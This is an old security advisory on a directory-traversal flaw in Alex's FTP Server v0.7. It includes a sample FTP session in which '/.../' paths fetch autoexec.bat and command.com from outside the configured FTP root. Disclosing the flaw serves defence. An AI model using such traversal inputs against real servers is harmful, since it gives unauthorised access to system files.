COMMAND

    Alex's FTP Server

SYSTEMS AFFECTED

    Alex's FTP Server

PROBLEM

    Joe  Testa  found  following.   Alex's  Ftp  Server v0.7 is an ftp
    server.  Vulnerabilities exist which allow a user to break out  of
    the ftp root.

    The following is an illustration of  the problem.  An ftp root  of
    'c:\directory\directory' was used:

        Connected to xxxxxxxxxx.rh.rit.edu.
        220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Enter PASS command
        Password:
        230 Logged in
        ftp> get /.../autoexec.bat
        200 Port command okay
        150 Opening data connection for retr "/.../autoexec.bat"
        226 Transfer complete
        ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
        ftp> cd ...
        257 "/.../" is current directory
        ftp> get command.com
        200 Port command okay
        150 Opening data connection for retr "/.../command.com"
        226 Transfer complete
        ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
        ftp>

SOLUTION

    No quick fix is possible.